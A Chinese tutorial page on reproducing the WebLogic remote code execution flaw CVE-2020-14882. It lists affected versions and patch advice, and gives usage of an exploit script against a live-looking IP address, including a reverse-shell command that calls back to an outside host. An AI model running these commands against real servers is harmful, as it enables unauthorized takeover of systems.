C/C++教程
weblogic 远程代码执行 (CVE-2020-14882)
本文主要是介绍weblogic 远程代码执行 (CVE-2020-14882),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
weblogic 远程代码执行 (CVE-2020-14882)
- weblogic 远程代码执行 (CVE-2020-14882)
- 0x01 漏洞描述
- 0x02 影响范围
- 0x03 漏洞复现
- 工具
- 0x04 漏洞修复
weblogic 远程代码执行 (CVE-2020-14882)
0x01 漏洞描述
Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 WebLogic Server Console ,并执行任意代码。
0x02 影响范围
Oracle Weblogic Server 10.3.6.0.0
Oracle Weblogic Server 12.1.3.0.0
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0
0x03 漏洞复现
工具
cve-2020-14882_rce.py
python3 使用
查看用法
python cve-2020-14882_rce.py
whoami
python cve-2020-14882_rce.py -u http://118.193.36.37:44924 -c whoami
ls /tmp
python cve-2020-14882_rce.py -u http://118.193.36.37:44924 -c “ls /tmp”
反弹shell
python cve-2020-14882_rce.py -u http://118.193.36.37:44924 -c "bash -i >& /dev/tcp/119.29.67.4/9897 0>&1"
虽然显示漏洞检查失败 但是执行成功
0x04 漏洞修复
安装官方最新补丁进行升级:
https://www.oracle.com/security-alerts
由于该漏洞的补丁存在被绕过的风险,建议临时关闭后台/console/console.portal对外访问。
这篇关于weblogic 远程代码执行 (CVE-2020-14882)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
微信支付提示下单账户与支付账户不一致-icode9专业技术文章分享07-03
-
微信支付提示订单号重复-icode9专业技术文章分享07-03
-
微服务启动nacos注册上去了,但是一直没有收到请求-icode9专业技术文章分享07-02
-
如何检查文件的编码格式-icode9专业技术文章分享07-02
-
sublime 更改编码格式-icode9专业技术文章分享07-02
-
uniAPP 实现全屏左右滚动滚动的效果-icode9专业技术文章分享06-30
-
如何在本地使用授权或插件-icode9专业技术文章分享06-30
-
伪静态规则配置方法汇总-icode9专业技术文章分享06-30
-
易优CMS安装常见问题汇总-icode9专业技术文章分享06-29
-
易优新手必读安装教程-icode9专业技术文章分享06-28
-
忘记eyoucms后台密码怎么办?-icode9专业技术文章分享06-28
-
终极指南:Scrum中如何设置需求优先级06-26
-
AI大模型企业应用实战(25)-为Langchain Agent添加记忆功能06-26
-
小白家庭 nas 搭建方案-icode9专业技术文章分享06-26
-
AI大模型企业应用实战(14)-langchain的Embedding06-23
栏目导航
